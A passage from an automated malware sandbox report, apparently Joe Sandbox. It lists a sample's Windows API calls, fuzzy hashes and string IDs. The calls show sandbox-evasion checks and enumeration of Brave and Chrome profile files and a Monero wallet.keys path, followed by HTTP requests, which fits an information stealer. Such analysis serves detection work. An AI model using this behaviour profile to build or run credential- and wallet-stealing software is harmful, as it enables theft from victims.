                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 48f6a15f5c44faa0f56db2d3c47d61d3fdff0e1ec06e3d9d487277aee033c2d0
                              • Instruction ID: 018922725b9f64f4543cc4610aaedefa2458bea335446c103b7ec3bb1dd2e087
                              • Opcode Fuzzy Hash: 48f6a15f5c44faa0f56db2d3c47d61d3fdff0e1ec06e3d9d487277aee033c2d0
                              • Instruction Fuzzy Hash: DCF05870A44209BFE712ABA0DC9BBBEBB38EB14701F108514F503BA1C1DBF05544EEA6

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: aa7dac549657eeb8a6958ccd4f36c9ec5275c189a42647e5144ae6344fade9c9
                              • Instruction ID: af5ec402f90f29046c55dd222459775b07bec6229e4042ef7a61c01e2c88e196
                              • Opcode Fuzzy Hash: aa7dac549657eeb8a6958ccd4f36c9ec5275c189a42647e5144ae6344fade9c9
                              • Instruction Fuzzy Hash: 22214FB1D00208ABDF14DFA4E845ADD7B78FB44320F108625F955AB2C0DB706A05DF92

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 00326280: InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                                • Part of subcall function 00326280: StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                                • Part of subcall function 00326280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                                • Part of subcall function 00326280: HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                                • Part of subcall function 00326280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                                • Part of subcall function 00326280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: e88cebc6782aa427a93720d8da0dd60e7e747ecb4ede470524316e8d62687f12
                              • Instruction ID: 18aa17a3be4c5296e4a45404fb5052fd76706389f5c3fb5a16855f83047f07d8
                              • Opcode Fuzzy Hash: e88cebc6782aa427a93720d8da0dd60e7e747ecb4ede470524316e8d62687f12
                              • Instruction Fuzzy Hash: 98117030800908ABCB06FFA4DDD2AED3738AF50300F404558F84A4F592EF34AB05DA91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 6ae7ed210da8c5b9820d40d9ffe3af2203132e5997e517094067ca69c096a645
                              • Instruction ID: 1b653c051b00136d40ecd615383c4d9003f8febc2ada86bfeeb1920f273223cb
                              • Opcode Fuzzy Hash: 6ae7ed210da8c5b9820d40d9ffe3af2203132e5997e517094067ca69c096a645
                              • Instruction Fuzzy Hash: BD0181B1A04208EBD710DF98DD85BAABBBCFB04B21F10421AFA45E7680C37459048BA2
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0032112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00321132
                              • ExitProcess.KERNEL32 ref: 00321143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 4715500cb45fcb7df496b6f406cce6f0d9b6782f6b47322d7d228defc08c3c7f
                              • Instruction ID: 92f66c899362117020d0a9e352d920e60c60e2c14511c3800e3aa25fe71cd75f
                              • Opcode Fuzzy Hash: 4715500cb45fcb7df496b6f406cce6f0d9b6782f6b47322d7d228defc08c3c7f
                              • Instruction Fuzzy Hash: 7CE0E670945348FBE7106BA4AD0AB097678EB14B01F104054F7097B1D0D6F52645AA99
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003210B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003210F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 066dd5887b72afb7a7700ced5af50f54bc20cb61a8232fc444fb4a0e39fa1d86
                              • Instruction ID: 25694bb7fa5ccf1271f2933bb188a52d4087fdab12344c01ddd42af8c8c75619
                              • Opcode Fuzzy Hash: 066dd5887b72afb7a7700ced5af50f54bc20cb61a8232fc444fb4a0e39fa1d86
                              • Instruction Fuzzy Hash: ABF02771641318BBE7149BA8AC49FBFB7ECE705B15F305448F504E7280D572AF44DAA0
                              APIs
                                • Part of subcall function 003378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                                • Part of subcall function 003378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                                • Part of subcall function 003378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                                • Part of subcall function 00337850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                                • Part of subcall function 00337850: RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                                • Part of subcall function 00337850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                              • ExitProcess.KERNEL32 ref: 003211C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: ed2a48753433a65663240951793fa538ee9b71c3b8c6fb1e8ed2f5d030b7e428
                              • Instruction ID: 630ebe7820db32b678270d7fb65046ba11dcca90a03de5378373e899d63dc4e8
                              • Opcode Fuzzy Hash: ed2a48753433a65663240951793fa538ee9b71c3b8c6fb1e8ed2f5d030b7e428
                              • Instruction Fuzzy Hash: 5BE012B591430953CE1173B8BD4BB2A339C9B34345F040425FA05EB212FAA5F8149967
                              APIs
                              • wsprintfA.USER32 ref: 003338CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 003338E3
                              • lstrcat.KERNEL32(?,?), ref: 00333935
                              • StrCmpCA.SHLWAPI(?,00340F70), ref: 00333947
                              • StrCmpCA.SHLWAPI(?,00340F74), ref: 0033395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00333C67
                              • FindClose.KERNEL32(000000FF), ref: 00333C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 1d16b51ba7eb5db1dc385e026c4821df5c73bee6a1593e7f5da8382b77a21d0e
                              • Instruction ID: 9dddfadb0482e9e54ca6f36ca35d6e8771bababd580a4ae484ad819d5eb6ea59
                              • Opcode Fuzzy Hash: 1d16b51ba7eb5db1dc385e026c4821df5c73bee6a1593e7f5da8382b77a21d0e
                              • Instruction Fuzzy Hash: 3DA101B1A002189BDB25DB64DC85FEA7379BF54300F048598F64DAB141EB75AB88CF62
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • FindFirstFileA.KERNEL32(00000000,?,00340B32,00340B2B,00000000,?,?,?,003413F4,00340B2A), ref: 0032BEF5
                              • StrCmpCA.SHLWAPI(?,003413F8), ref: 0032BF4D
                              • StrCmpCA.SHLWAPI(?,003413FC), ref: 0032BF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0032C7BF
                              • FindClose.KERNEL32(000000FF), ref: 0032C7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 6533c49eaa843b210cd9dbbab08f4a4e3028e8221be198d3231bf28b7e4f2c29
                              • Instruction ID: e99975a8fd42d253da3eabc0f8e90b871212f3a2e087c4d2447ceb195d96a825
                              • Opcode Fuzzy Hash: 6533c49eaa843b210cd9dbbab08f4a4e3028e8221be198d3231bf28b7e4f2c29
                              • Instruction Fuzzy Hash: A1426172910108ABCB16FBA4DDD6EED737CAF54300F404558F94AAB181EF34AB49DB92
                              APIs
                              • wsprintfA.USER32 ref: 0033492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00334943
                              • StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                              • StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                              • FindClose.KERNEL32(000000FF), ref: 00334B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 2d58a1364e2bc3b971f666ff690893a4693512e52e12c556bc26949e8c293e4e
                              • Instruction ID: 10c9310813c91ba9cf16725b72e6832be0b4f21e86331d3a7a5ec415f41f0484
                              • Opcode Fuzzy Hash: 2d58a1364e2bc3b971f666ff690893a4693512e52e12c556bc26949e8c293e4e
                              • Instruction Fuzzy Hash: 4B616871900218ABCB25EBA4DC85FEA73BCBB58700F044598F649A7141EB75EB89CF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00334580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00334587
                              • wsprintfA.USER32 ref: 003345A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 003345BD
                              • StrCmpCA.SHLWAPI(?,00340FC4), ref: 003345EB
                              • StrCmpCA.SHLWAPI(?,00340FC8), ref: 00334601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0033468B
                              • FindClose.KERNEL32(000000FF), ref: 003346A0
                              • lstrcat.KERNEL32(?,0109E908), ref: 003346C5
                              • lstrcat.KERNEL32(?,0109DCC0), ref: 003346D8
                              • lstrlen.KERNEL32(?), ref: 003346E5
                              • lstrlen.KERNEL32(?), ref: 003346F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 23fea089ea197c95f92460b8e414d2f7549107999c0db732ff2c5660b1d4a560
                              • Instruction ID: 9b1cd182f9e72bd96e89f04b7beb693dfbe8dbd8f101a4217ec1809810a4f7a9
                              • Opcode Fuzzy Hash: 23fea089ea197c95f92460b8e414d2f7549107999c0db732ff2c5660b1d4a560
                              • Instruction Fuzzy Hash: 335157B1940218ABC725EB74DC89FED737CAB64700F404598F609A7150EBB4AB899F91
                              APIs
                              • wsprintfA.USER32 ref: 00333EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00333EDA
                              • StrCmpCA.SHLWAPI(?,00340FAC), ref: 00333F08
                              • StrCmpCA.SHLWAPI(?,00340FB0), ref: 00333F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0033406C
                              • FindClose.KERNEL32(000000FF), ref: 00334081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
